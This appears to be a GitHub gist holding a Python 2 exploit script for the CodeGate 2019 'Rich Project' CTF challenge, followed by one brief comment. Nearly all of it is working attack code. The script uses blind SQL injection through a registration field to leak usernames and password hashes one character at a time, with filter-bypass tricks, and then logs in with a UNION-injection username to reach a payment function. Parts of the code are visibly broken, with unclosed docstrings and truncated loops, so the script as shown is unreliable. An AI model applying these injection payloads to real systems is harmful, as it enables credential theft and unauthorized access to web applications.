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Last active August 17, 2019 19:28
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CodeGate 2019: Rich Project exploit
import os
import urllib2
import urllib
import random
import sys
import time
import hashlib
def rand(sz=4):
return str(random.randint(10**sz, 100**sz))
COOKIE = "PHPSESSID=styprisgood1234123401" + rand(5)
def logout():
u = urllib2.Request("")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u).read()
return r
def join(username, password, account):
u = urllib2.Request("")
u.add_header("Cookie", COOKIE)
d = urllib.urlencode({'id': username, 'pw': password, 'ac': account})
r = urllib2.urlopen(u, d).read()
return r
def info():
u = urllib2.Request("")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u).read()
return r
def pwn_mysql(blacklist):
''' leak credentials
>>> pwn_mysql(['admin', 'stypr', 'lol'])
# db: userdata
# user: db_manager
# version: 5.7.25-0ubuntu
find_out = ['id', 'pw', 'ac']
b = ""
for i in blacklist:
b += "0x" + i.encode('hex')
b += ","
b = b[:-1]
blacklist = b
leaked = []
q = 0
for k in find_out:
d = ""
for i in xrange(1, 256):
# admin: 4dcc4173d80a2817206e196a38f0dbf7850188ff : ADMIN_ACC0UNTS
# cracked password = hacker
""" D0_N0T_RE1E@5E_0THER5 on board.php """
# like_prefer: LIKE search, you can just put "admin"..
like_prefer = "0x" + "%a_%".encode('hex')
''' use max(), case match, select distinct... to bypass `where` and `limit` phrase
a = join('stypr' + rand(), 'stypr' + rand(), "' + (select ascii(right(left(max(y),%s),1)) from (select distinct (case when id not in (%s) and id like %s then %s else 1337 end) as y from users)x ))#" % (i,blacklist,like_prefer,find_out[q]))
b = info()
info_rec = b.split("AC :")[1].split("<br")[0].strip()
tmp = chr(int(info_rec))
if d:
if d[-1] == tmp:
d += tmp
print(">>", d)
q += 1
return leaked
def login(username, password, account):
u = urllib2.Request("")
u.add_header("Cookie", COOKIE)
d = urllib.urlencode({'id': username, 'pw': password, 'ac': account})
r = urllib2.urlopen(u, d).read()
return r
def reserv(timed, amount):
code = "D0_N0T_RE1E@5E_0THER5"
d = urllib.urlencode({'code': code, 'date': timed, 'amount': amount})
u = urllib2.Request("")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u, d).read()
return r
def pay():
u = urllib2.Request("")
u.add_header("Cookie", COOKIE)
r = urllib2.urlopen(u).read()
return r
# robots.txt -> /
# pay.php --> check pw
username = "0x" + "S'union select 1,9e99,3,4,5#".encode('hex')
password = "0x" + hashlib.sha1("stypr_is_nope").hexdigest().encode('hex')
#print join('s'+rand(), 'stypr_flag133713372', "t'),(%s,%s,1234)#" % (username,password,))
#login as S'union select 1,9e99,3,4,5# / stypr_is_nope / 1234
print login("S'union select 1,9e99,3,4,5#", "stypr_is_nope", "1234")
print pay()
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c0frex commented Feb 11, 2019

you seem to be already stereotyped.

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